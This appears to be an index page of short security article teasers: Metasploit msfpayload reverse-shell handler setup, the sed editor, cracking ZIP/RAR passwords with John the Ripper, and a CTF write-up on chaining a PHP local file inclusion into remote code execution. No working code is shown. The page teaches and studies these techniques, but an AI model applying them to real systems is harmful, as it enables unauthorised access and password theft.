Detalhes
Categoria: Artigos

Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give you a shell in almost any situation. For each of these payloads you can go into msfconsole and select exploit/multi/handler. Run ‘set payload’ for the relevant payload used and configure all necessary options (LHOST, LPORT, etc). Execute and wait for the payload to be run. For the examples below it’s pretty self explanatory but LHOST should be filled in with your IP address (LAN IP if attacking within the network, WAN IP if attacking across the internet), and LPORT should be the port you wish to be connected back on.

Detalhes
Categoria: Artigos

The sed stream editor is a text editor that performs editing operations on information coming from standard input or a file. Sed edits line-by-line and in a non-interactive way.

In general, sed operates on a stream of text that it reads from either standard input or from a file.This means that you can send the output of another command directly into sed for editing, or you can work on a file that you’ve already created. You should also be aware that sed outputs everything to standard out by default. That means that, unless redirected, sed will print its output to the screen instead of saving it in a file.

Detalhes
Categoria: Artigos
After seeing how to compile John the Ripper to use all your computer's processors now we can use it for some tasks that may be useful to digital forensic investigators: getting around passwords. Today we will focus on cracking passwords for ZIP and RAR archive files. Luckily, the JtR community has done most of the hard work for us. For this to work you need to have built the community version of John the Ripper since it has extra utilities for ZIP and RAR files.

Detalhes
Categoria: Artigos

Overview

This post is the second part of the Bypassing PHP Null Byte injection protections blogpost. If you want to try the CTF first before going through the write up, head to the link first. Otherwise, keep on reading :)

The main trick described in this write-up relies on the fact that a Local File Include (LFI) vulnerability is exploitable but with some restrictions imposed by the code. Among these restrictions, there is some active filtering on Path Traversal. Name;u, an image file extension (.png) is always appended to the successfully uploaded files. In addition, the server is running an up to date version of PHP which is not vulnerable to the well known Null Byte Injection trick.

To bypass these restrictions and successfully achieve Remote Code Execution chaining through the aforementioned LFI vulnerability, one can use one of the built-in PHP Wrappers as described in detail on the next section of this write-up.

  1. Extracting RAW pictures from memory dumps
  2. Exploiting PHP File Inclusion – Overview
  • Você está aqui:  
  • Pagina Principal